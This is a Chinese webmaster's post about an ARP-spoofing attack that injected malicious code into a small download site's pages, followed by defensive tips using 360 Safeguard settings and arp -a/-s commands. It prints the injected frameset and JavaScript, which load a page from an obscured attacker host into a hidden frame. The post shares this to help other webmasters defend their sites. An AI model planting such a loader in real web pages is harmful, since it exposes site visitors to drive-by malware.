尊敬的ouyaoxiazai用户们,很遗憾的通知大家08.15凌晨,本站服务器遭受变态ARP攻击。。
www.ouyaoxiazai.com只是个小站,不知为何招来ARP攻击,在此我向发起攻击的人发出严厉的谴责。
由于事情发生在8月15凌晨,当时本人正好在线,当24个用户提交感染病毒的网页到360时,360第1时间对网页进行拦截。在这里真的很佩服360还有金山,果然名不虚传。。
所以对于用户们并没有产生太大的影响。
我站第1时间做出了处理,不过处理过程真的很苛刻。。
本站已经将所收集的资料统一整理,提交给机房处理。。
如果你是攻击者,也请你住手,停止你的一切非法攻击活动,网络环境本身就不好,为什么总是有一部分人每天干着无聊的事情,将快乐驾御在别人痛苦之上呢???
攻击者源头:121.12.172.8X (广东省网监总队,东莞市之队)
挂马代码指向:j-g-h-j-h-.-3-3-2-2-.-o-r-g(去掉“-”)
(代码分析已经保存)
目前已经将上述问题,提交到广东省东莞市网监部门备案。请攻击者悬崖勒马,目前站长们生存很难的,何必要再给大家难上加难呢?
发表一下临时处理方法吧。。。。也算给广大站长们留做备用,发现问题的时候好处理,当我处理这个问题的时候,网络上资料真的很少,都模糊不清。。
普通情况下,流行的ARP攻击,安装360安全卫士就可以防御,但是目前网络上出现了一种变态ARP攻击方法,360安全卫士在不调节的情况下是是一点也无法拦截的。具体方法下文中讲述。。
挂马代码:
(上述代码有少许更改。。。。。。。基本是这个样子)
以下是引用片段:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="“G”ttp://XXX.3322.XXX:6677/m/index.html";}(这个地址大家一猜就猜的到)
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="https://img.downbl.com/soft/stgj/51/9815.html">UpdatedPage=aGlqYWNr"
<frame name="hi" src="">
</frameset>
</html>
症状如下:
打开服务器上所有网站的网页出现像挂马,第1时间您会开启360,可是您会发现居然检测不出来。无效!!
到服务器上去查看网页程序没有被任何修改过,服务器也没有中毒,ARP防火墙也没有提示有ARP攻击,这就是这种变态的ARP攻击方式的变态之处。。。。。。
临时解决方法:
arp -a命令查看网关MAC地址,并记在记事本上,
然后运行“360安全卫士”,把ARP防御打开,最关键的要把“ARP防御设置”设置为《始终启用》,一定不能用自动防御,记住!360安全卫士就是因为默认情况下是自动拦截才不管用的。。。防御速度:最大,设置手动绑定网关。。。。把上面arp -a命令探测的地址加进去,然后点保存。。。!
然后重新启动服务器。。最好是多重起几次。。。
然后手动静态捆绑arp,命令如:
arp -s 221.XXX.XX.111 XX.XX.XX.XX.XX
(上面的意思是arp -s 网关的IP地址 网关的MAC地址)
这样。。。。。(可能不管用。。。)
具体就这么多了。。。具体大家配合arp -d,arp -a,arp -s,这几个命令操作一下。。。
最后通知机房,将发起攻击的那台服务器找出来。。
真的很希望网络上少一些纷争,给我们这些小站长们一点空间,可是真的很难,草根站长们还要继续往前走。。
